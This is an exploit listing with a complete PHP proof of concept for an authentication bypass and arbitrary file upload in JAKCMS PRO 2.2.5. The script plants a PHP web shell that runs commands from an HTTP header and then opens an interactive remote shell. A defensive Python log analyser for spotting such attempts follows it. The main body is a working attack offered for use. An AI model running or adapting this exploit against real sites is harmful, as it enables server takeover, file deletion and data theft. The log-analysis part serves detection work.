Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit
Author: EgiX
Software link: http://www.jakcms.com/
Affected Version: 2.2.5
Test Platform: Windows 7 and Debian 6.0.2
<?php

/*
    --------------------------------------------------------
    JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit
    --------------------------------------------------------

    author..........: EgiX
    mail............: n0b0d13s[at]gmail[dot]com
    software link...: http://www.jakcms.com/

    This PoC was written for educational purpose. Use it at your own risk.
    Author will be not responsible for any damage.

    [-] Vulnerable code in /js/editor/plugins/jakadminexplorer/php/session.php

    119.    if ($SESSION["check_session_variable"] != "") {
    120.
    121.        // Start session
    122.        session_start();
    123.
    124.        // Check session variable
    125.        if (!isset($_SESSION[$SESSION["check_session_variable"]])) {
    126.            include("error.php");
    127.            die;
    128.        }
    129.    }

    This authentication schema could be bypassed because an attacker might be able to start a session
    by accessing /index.php, which sets e.g. the "jak_lastURL" session variable, so
    $SESSION["check_session_variable"] could be set to that name to bypass the check at line 125.
    Successful exploitation allows attackers access to the plugin's functionality
    (see /js/editor/plugins/jakadminexplorer/php/action.php); in this way an attacker could
    "delete", "create", "rename" any folder/file on the web server or upload arbitrary files.
    The same vulnerability also affects the jakadminimage, jakusrexplorer and jakusrimage plugins.

    [-] Disclosure timeline:

    [15/09/2011] - Vulnerability discovered
    [16/09/2011] - Issue reported to http://www.jakcms.com/tracker/t/61/security-flaw-imagefilemanager
    [16/09/2011] - Vendor fix released in version 2.2.6
    [21/09/2011] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

// Send a raw HTTP request to port 80 and return the full response
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");

    fputs($sock, $packet);
    return stream_get_contents($sock);
}

// RC4 with the plugin's fixed key, used to scramble the "get" parameter
function RC4($data)
{
    $key = "success";
    $s = range(0, 255);
    $j = 0;

    // Key-scheduling algorithm
    for ($i = 0; $i < 256; $i++)
    {
        $j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256;
        $x = $s[$i];
        $s[$i] = $s[$j];
        $s[$j] = $x;
    }

    $i = $j = 0;
    $ct = "";

    // Keystream generation and XOR
    for ($y = 0; $y < strlen($data); $y++)
    {
        $i = ($i + 1) % 256;
        $j = ($j + $s[$i]) % 256;
        $x = $s[$i];
        $s[$i] = $s[$j];
        $s[$j] = $x;
        $ct .= $data[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]);
    }

    return $ct;
}

print "\n+------------------------------------------------------------------+";
print "\n| JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0]\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /jakcms/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

// Obtain a session cookie by requesting the front page
$packet  = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);
$sid = $m[1];

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";
$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";

$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));

$packet  = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n");

$packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while (1)
{
    print "\njakcms-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

?>
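For incident responders checking whether the bypass described in the advisory comments was tried against a site, the following added example (not part of EgiX's PoC or of JAK CMS) decodes the RC4-scrambled "get" parameter from web-server access-log lines and flags requests in which the client supplied its own check_session_variable or an executable upload_filetype. The RC4 key "success" comes from the PoC above; the expected legitimate session-variable name and the sample log line are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlparse
# Key the jakadminexplorer plugin uses to RC4-scramble its "get" parameter (taken from the PoC above).
PLUGIN_RC4_KEY = b"success"
# Name the legitimate editor sends in check_session_variable: assumed placeholder, the page does not state it.
EXPECTED_CHECK_VARIABLE = "jak_admin_session"
EXECUTABLE_TYPES = {"php", "php3", "php4", "php5", "phtml", "phar"}
PLUGIN_REQUEST = re.compile(
    r'"(?:GET|POST) (\S*/plugins/(jakadminexplorer|jakadminimage|jakusrexplorer|jakusrimage)/\S*) HTTP/')

def rc4(key: bytes, data: bytes) -> bytes:
    # Plain RC4 (KSA + PRGA); encryption and decryption are the same operation.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

def analyze_log_line(line: str):
    # Returns None for requests outside the four plugins, else decoded parameters plus a verdict.
    m = PLUGIN_REQUEST.search(line)
    if not m:
        return None
    outer = parse_qs(urlparse(m.group(1)).query)
    try:
        inner = parse_qs(rc4(PLUGIN_RC4_KEY, bytes.fromhex(outer.get("get", [""])[0])).decode("latin-1"))
    except ValueError:  # "get" missing or not valid hex
        inner = {}
    params = {k: v[0] for k, v in inner.items()}
    reasons = []
    if params.get("check_session_variable", EXPECTED_CHECK_VARIABLE) != EXPECTED_CHECK_VARIABLE:
        reasons.append("client supplied its own check_session_variable")
    if params.get("upload_filetype", "").lower() in EXECUTABLE_TYPES:
        reasons.append("upload_filetype is a server-side executable extension")
    return {"plugin": m.group(2), "action": outer.get("action", [""])[0],
            "params": params, "reasons": reasons, "suspicious": bool(reasons)}

# Constructed access-log line modelled on the PoC's upload request; not a real capture.
_scrambled = rc4(PLUGIN_RC4_KEY,
                 b"id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir=/jakcms/cache/sh").hex()
SAMPLE_LOG_LINE = ('203.0.113.5 - - [21/Sep/2011:10:15:32 +0000] "POST /jakcms/js/editor/plugins/'
                   f'jakadminexplorer/?action=upload&get={_scrambled} HTTP/1.0" 200 512')
```

Feed real access-log lines through analyze_log_line() and review every entry whose "suspicious" field is set; the decoded "dir" value shows where an uploaded file would have been written.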